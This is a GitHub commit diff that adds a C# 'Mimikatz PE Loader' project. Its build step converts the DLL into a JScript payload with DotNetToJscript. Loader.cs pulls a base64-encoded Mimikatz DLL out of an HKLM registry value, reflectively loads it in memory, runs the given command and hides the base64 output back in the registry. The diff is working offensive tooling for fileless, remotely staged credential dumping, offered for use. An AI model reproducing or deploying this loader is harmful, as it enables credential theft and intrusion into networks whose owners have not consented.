add Mimikatz PE Loader library

Used in https://github.com/xorrior/RandomPS-Scripts/blob/master/Invoke-RemoteMimikatz.ps1
xorrior · Dec 29, 2017 · cd0f644 · cd0f644
1 parent 70afb61
commit cd0f644
Show file tree

Hide file tree

Showing 27 changed files with 1,742 additions and 0 deletions.
diff --git a/CyDuck/.vs/CyDuck/v14/.suo b/CyDuck/.vs/CyDuck/v14/.suo
diff --git a/CyDuck/CyDuck/obj/Release/CyDuck.exe.tmp b/CyDuck/CyDuck/obj/Release/CyDuck.exe.tmp
diff --git a/CyDuck/CyDuck/obj/Release/CyDuck.pdb.tmp b/CyDuck/CyDuck/obj/Release/CyDuck.pdb.tmp
diff --git a/DllLoader/.vs/DllLoader/v14/.suo b/DllLoader/.vs/DllLoader/v14/.suo
diff --git a/DllLoader/DllLoader.sln b/DllLoader/DllLoader.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DllLoader", "DllLoader\DllLoader.csproj", "{817CC61B-8471-4C1E-B5D6-C754FC550A03}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{817CC61B-8471-4C1E-B5D6-C754FC550A03}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{817CC61B-8471-4C1E-B5D6-C754FC550A03}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{817CC61B-8471-4C1E-B5D6-C754FC550A03}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{817CC61B-8471-4C1E-B5D6-C754FC550A03}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/DllLoader/DllLoader/DllLoader.csproj b/DllLoader/DllLoader/DllLoader.csproj
@@ -0,0 +1,57 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{817CC61B-8471-4C1E-B5D6-C754FC550A03}</ProjectGuid>
+    <OutputType>Library</OutputType>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <RootNamespace>DllLoader</RootNamespace>
+    <AssemblyName>DllLoader</AssemblyName>
+    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <TargetFrameworkProfile />
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <DebugType>pdbonly</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
+    <RegisterForComInterop>false</RegisterForComInterop>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Loader.cs" />
+    <Compile Include="PELoader.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <PropertyGroup>
+    <PostBuildEvent>DotNetToJscript.exe -n -d --lang=JScript --ver=Auto -o=$(TargetDir)mimikatz.js -c=mimikatzLoader $(TargetPath)</PostBuildEvent>
+  </PropertyGroup>
+  <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
+       Other similar extension points exist, see Microsoft.Common.targets.
+  <Target Name="BeforeBuild">
+  </Target>
+  <Target Name="AfterBuild">
+  </Target>
+  -->
+</Project>
diff --git a/DllLoader/DllLoader/Loader.cs b/DllLoader/DllLoader/Loader.cs
@@ -0,0 +1,53 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Runtime.InteropServices;
+using System.Reflection;
+using System.IO;
+using DllLoader;
+using Microsoft.Win32;
+
+
+[ComVisible(true)]
+public class mimikatzLoader
+{
+    public mimikatzLoader()
+    {
+
+    }
+
+    public void mimikatz(string command, string key)
+    {
+        RegistryKey hklm = Registry.LocalMachine;
+        RegistryKey resultKey;
+        if ((resultKey = hklm.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree)) == null)
+            System.Environment.Exit(0);
+
+        string encDll = (string)resultKey.GetValue("debug");
+        resultKey.SetValue("debug", "");
+        byte[] dll = Convert.FromBase64String(encDll);
+        IntPtr result = Load.LoadPE(dll);
+
+        IntPtr output;
+        IntPtr input = Marshal.StringToHGlobalUni(command);
+
+        if (result != IntPtr.Zero)
+        {
+            m mimikatz = (m)Marshal.GetDelegateForFunctionPointer(result, typeof(m));
+            output = mimikatz(input);
+            string results = Marshal.PtrToStringUni(output);
+
+            string encResults = Convert.ToBase64String(Encoding.ASCII.GetBytes(results));
+            resultKey.SetValue("debug", encResults, RegistryValueKind.String);
+#if DEBUG
+            Console.Write(results);
+#endif
+        }
+    }
+
+    [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+    public delegate IntPtr m(IntPtr command);
+}
+
+
+